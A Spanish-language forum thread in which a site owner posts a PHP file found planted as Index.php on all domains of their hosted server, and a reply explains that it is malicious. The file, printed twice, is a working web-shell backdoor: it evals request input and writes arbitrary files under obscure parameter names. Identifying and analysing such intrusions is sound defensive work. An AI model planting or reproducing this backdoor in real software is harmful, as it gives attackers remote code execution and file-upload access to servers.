Hola muchachos, en esta ocasión les comparto el código que encontré hoy en la mañana en mi server de godaddy.
<?php
if(isset($_REQUEST['gnobkr_galuh'])) { $hklp_mrzpfa = $_REQUEST['gnobkr_galuh']; eval($hklp_mrzpfa); } if(isset($_REQUEST['wzv_ttbhhc'])) { $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp']; $fjy_qgk = $_REQUEST['wzv_ttbhhc']; file_put_contents($fjy_qgk, $ytyye_fpbqa); }
?>
El contenido estaba dentro de un archivo Index.php, que se había creado en todos los dominios de mi server, tengo varios dominios alojados, cuando cargaba cualquiera de esos dominios se mostraba en blanco, obviamente porque no enviaba las variables que requiere este script. Yo soy programador en php intermedio, pero con este código me basta para hacer desmadres en el servidor.
¿Sus opiniones? :huh:
<?php
if (isset($_REQUEST['gnobkr_galuh'])) {
$hklp_mrzpfa = $_REQUEST['gnobkr_galuh'];
eval($hklp_mrzpfa);
}
if (isset($_REQUEST['wzv_ttbhhc'])) {
$ytyye_fpbqa = $_REQUEST['pmhoc_pkkp'];
$fjy_qgk = $_REQUEST['wzv_ttbhhc'];
file_put_contents($fjy_qgk, $ytyye_fpbqa);
}
Quizás ya que ejecuta la función eval() (http://php.net/manual/es/function.eval.php), es muy peligroso porque permite la ejecución de código de PHP arbitrario.
Hasta puede subir un archivo al servidor, quizás webshell con la función file_put_contents() (http://php.net/file_put_contents)
Queda claro que al recibir variables con esos nombres que solo el atacante podría conocer, además de ejecutar código arbitrario con "eval" ES MALICIOSO.
TEMA CERRADO!
Gracias